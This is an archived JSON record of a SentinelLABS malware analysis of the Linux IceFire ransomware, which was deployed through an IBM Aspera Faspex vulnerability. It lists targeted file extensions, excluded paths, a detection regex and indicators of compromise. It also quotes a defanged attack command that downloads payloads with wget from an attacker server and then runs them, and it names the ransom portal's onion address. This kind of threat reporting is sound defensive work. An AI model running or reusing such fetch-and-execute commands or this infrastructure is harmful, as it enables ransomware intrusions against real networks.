{
	"id": "a812d6c9-017a-4c69-8769-df597388d2eb",
	"created_at": "2026-04-10T03:22:03.667755Z",
	"updated_at": "2026-04-10T03:22:19.634397Z",
	"deleted_at": null,
	"sha1_hash": "fa5af5e4b855faf0e45cdc81fe07edbf8d5097ae",
	"title": "IceFire Ransomware Returns | Now Targeting Linux Enterprise Networks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5667821,
	"plain_text": "IceFire Ransomware Returns | Now Targeting Linux Enterprise\r\nNetworks\r\nBy Alex Delamotte\r\nPublished: 2023-03-09 · Archived: 2026-04-10 02:36:10 UTC\r\nExecutive Summary\r\nIn recent weeks SentinelLABS observed novel Linux versions of IceFire ransomware being deployed within the\r\nenterprise network intrusions of several media and entertainment sector organizations worldwide.\r\nCurrent observations indicate the attackers deployed the ransomware by exploiting CVE-2022-47986, a\r\ndeserialization vulnerability in IBM Aspera Faspex file sharing software.\r\nThe operators of the IceFire malware, who previously focused only on targeting Windows, have now expanded their\r\nfocus to include Linux. This strategic shift is a significant move that aligns them with other ransomware groups who\r\nalso target Linux systems.\r\nBackground\r\nSentinelLABS recently observed a novel Linux version of the IceFire ransomware being deployed in mid-February against\r\nenterprise networks. The iFire file extension is associated with known reports of IceFire, a ransomware family noted by\r\nMalwareHunterTeam in March 2022.\r\nPrior to this report, IceFire had only shown a Windows-centric focus. The attackers' tactics are consistent with those of the\r\n‘big-game hunting’ (BGH) ransomware families, which involve double extortion, targeting large enterprises, using\r\nnumerous persistence mechanisms, and evading analysis by deleting log files. Previous reports indicate that IceFire targeted\r\ntechnology companies; SentinelLABS observed these recent attacks against organizations in the media and entertainment\r\nsector. IceFire has impacted victims in Turkey, Iran, Pakistan, and the United Arab Emirates, which are typically not a focus\r\nfor organized ransomware actors.\r\nTechnical Analysis\r\nThe IceFire Linux version (SHA-1: b676c38d5c309b64ab98c2cd82044891134a9973) is a 2.18 MB, 64-bit ELF binary\r\ncompiled with gcc for AMD64 architecture. 
We tested the sample on Intel-based distributions of Ubuntu and Debian; IceFire\r\nran successfully on both test systems.\r\nIn observed intrusions, the Linux version was deployed against CentOS hosts running a vulnerable version of IBM Aspera\r\nFaspex file server software. The system downloaded two payloads using wget and saved them to /opt/aspera/faspex:\r\nsh -c rm -f demo iFire \u0026\u0026 wget hxxp[://]159.65.217.216:8080/demo \u0026\u0026 wget\r\nhxxp[://]159.65.217.216:8080/{redacted_victim_server}/iFire \u0026\u0026 chmod +x demo \u0026\u0026 ./demo\r\nOn execution, files are encrypted and renamed with the “.ifire” extension appended to the file name. IceFire then deletes\r\nitself by removing the binary, which is evident in the picture below.\r\nhttps://www.sentinelone.com/labs/icefire-ransomware-returns-now-targeting-linux-enterprise-networks/\r\nPage 1 of 5\n\nFiles on the user desktop of a Debian system before and after running IceFire\r\nThe “.iFire” extension is appended to the file name. IceFire skipped the files with “.sh” and “.cfg” extensions.\r\nA file with the CPP extension that was encrypted by IceFire\r\nExcluded Files \u0026 Folders\r\nThe sample contains data segment references to a list of file extensions. These extensions are excluded from encryption, as\r\nthey pertain to executables or to application or system functionality. 
In the case of .txt and .pid, encrypting these files could potentially\r\nimpede the ransomware's own functionality.\r\n.cfg .o .sh .img .txt .xml .jar .pid .ini .pyc .a .so .run .env .cache .xmlb\r\nThe following file extensions are targeted for encryption:\r\n.sample .pack .idx .bitmap .gzip .bundle .rev .war .7z .3ds .accdb .avhd .back .cer .ctl .cxx .dib .disk .dwg\r\n.fdb .jfif .jpe .kdbx .nrg .odc .odf .odg .odi .odm .odp .ora .ost .ova .ovf .p7b .p7c .pfx .pmf .ppt .qcow\r\n.rar .tar .tib .tiff .vbox .vcb .vdi .vfd .vhd .vhdx .vmc .vmdk .vmsd .vmtm .vsdx .vsv .work .xvd .vswp .nvram\r\n.vmxf .vmem .vmsn .vmss .wps .cad .mp4 .wmv .rm .aif .pdf .doc .docx .eml .msg .mail .rtf .vbs .c .cpp .cs\r\n.pptx .xls .xlsx\r\nIceFire ransomware doesn’t encrypt all files on Linux: it avoids encrypting certain paths, so that critical parts of the system\r\nare not encrypted and remain operational. In one observed infection, the /srv directory was encrypted, so these exclusions\r\ncan be selectively overridden.\r\nFolder | Description\r\n/boot | Data used at startup\r\n/dev | Device files, drivers\r\n/etc | System configuration files\r\n/lib | Shared libraries used by applications or system for dynamically-linked functionality\r\n/proc | Virtual filesystem used by Linux to store runtime system information like PIDs, mounted drives, system configuration, etc.\r\n/srv | Web server directories\r\n/sys | Interface to the kernel; similar to /proc\r\n/usr | User-level binaries and static data\r\n/var | Dynamic data, e.g. caches, databases\r\n/run | System information, including PID files; cleared on each reboot\r\nDuring our analysis, the user profile directory at /home/[user_name]/ saw the most encryption activity. 
IceFire targets user\r\nand shared directories (e.g., /mnt, /media, /share) for encryption; these are unprotected parts of the file system that do\r\nnot require elevated privileges to write or modify.\r\nInterestingly, several file sharing clients downloaded benign encrypted files after IceFire had encrypted the file server’s\r\nshared folders. Despite the attack on the server, clients were still able to download files from the encrypted server. This\r\nimplies the IceFire developer made thoughtful choices in the excluded paths and file extensions.\r\nIceFire Linux Payload Delivery \u0026 Infrastructure\r\nIceFire for Windows is delivered through phishing messages and pivoting using post-exploitation frameworks. The Linux\r\nvariant is in its infancy, though our observations indicate it was deployed using an exploit for CVE-2022-47986, a recently\r\npatched vulnerability in IBM’s Aspera Faspex file sharing software.\r\nIceFire payloads are hosted on a DigitalOcean droplet at 159.65.217.216 with the following URL format:\r\nhxxp[://]159.65.217.216:8080/(subdomain.domain.TLD|IP_Address)/iFire\r\nThe following regular expression can be used to detect IceFire payload URLs. Consider wildcarding the DigitalOcean IP\r\naddress in case the actors pivot to a new delivery IP or domain.\r\nhttp:\\/\\/159\\.65\\.217\\.216:8080\\/(([a-z]+\\.){2}([a-z]+)|^((25[0-5]|(2[0-4]|1\\d|[1-9]|)\\d)\\.?\\b){4})\\/iFire\r\nOpen-source intelligence platforms revealed a history of Aspera Faspex activity on IP address 159.65.217.216, including:\r\n- Other payload URLs with “aspera” in the secondary hostname section of the URI\r\n- Session cookie name: _aspera_faspex_session\r\n- Service fingerprinting indexed a vulnerable version of Aspera Faspex software\r\nNotable Findings\r\nAs of this writing, the IceFire binary was detected by 0/61 VirusTotal engines. 
Notably, this sample contains many statically\r\nlinked functions from the legitimate OpenSSL library, contributing to the relatively large file size.\r\nThe binary contains the following hardcoded RSA public key:\r\n-----BEGIN RSA PUBLIC KEY-----\r\nMIIBCgKCAQEA0lImq1tu0GPOv0cj78WMTeI+l9Coo0U5VtXj1/13Hds3HVXL5K3+\\nZYn/ygsTmRByTU/ZvwoWPqozH4N+RTj0W3MG6KSew1n2duKIkBiexMDN+Ip/qP2w\\nFadq\r\n-----END RSA PUBLIC KEY-----\r\nIn a cryptographic logging function, the binary contains an embedded path referencing the Desktop for a user named\r\n“Jhone.” The .cnf extension potentially refers to a configuration file. The relic was near the end of the OpenSSL\r\nfunctionality; it is possible that this artifact originated in the OpenSSL package rather than with the ransomware\r\ndeveloper.\r\nFunction for writing a log file to user Jhone’s Desktop\r\nRansom Notes\r\nIceFire drops the ransom note from an embedded resource in the binary and writes it to each directory targeted for file\r\nencryption. The ransom note contains a hardcoded username and password that are required to log into the ransom payment\r\nportal hosted on a Tor hidden service at 7kstc545azxeahkduxmefgwqkrrhq3mzohkzqvrv7aekob7z3iwkqvyd[.]onion.\r\nLinux version of IceFire ransom note\r\nThe Linux version’s Onion hostname matches the hostname that ransomware trackers tie to IceFire, including attacks\r\ntargeting Windows.\r\nIceFire ransom login page\r\nIceFire victim leaks page\r\nConclusion\r\nThis evolution of IceFire reinforces the observation that ransomware targeting Linux continues to grow in popularity through 2023. 
While the\r\ngroundwork was laid in 2021, the Linux ransomware trend accelerated in 2022 when prominent groups added Linux\r\nencryptors to their arsenal, including the likes of BlackBasta, Hive, Qilin, Vice Society aka HelloKitty, and others.\r\nIn comparison to Windows, Linux is more difficult to deploy ransomware against, particularly at scale. Many Linux systems\r\nare servers: typical infection vectors like phishing or drive-by download are less effective. To overcome this, actors turn to\r\nexploiting application vulnerabilities, as the IceFire operator demonstrated by deploying payloads through an IBM Aspera\r\nvulnerability.\r\nIndicators of Compromise\r\nSource: https://www.sentinelone.com/labs/icefire-ransomware-returns-now-targeting-linux-enterprise-networks/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.sentinelone.com/labs/icefire-ransomware-returns-now-targeting-linux-enterprise-networks/"
	],
	"report_names": [
		"icefire-ransomware-returns-now-targeting-linux-enterprise-networks"
	],
	"threat_actors": [],
	"ts_created_at": 1775791323,
	"ts_updated_at": 1775791339,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fa5af5e4b855faf0e45cdc81fe07edbf8d5097ae.pdf",
		"text": "https://archive.orkl.eu/fa5af5e4b855faf0e45cdc81fe07edbf8d5097ae.txt",
		"img": "https://archive.orkl.eu/fa5af5e4b855faf0e45cdc81fe07edbf8d5097ae.jpg"
	}
}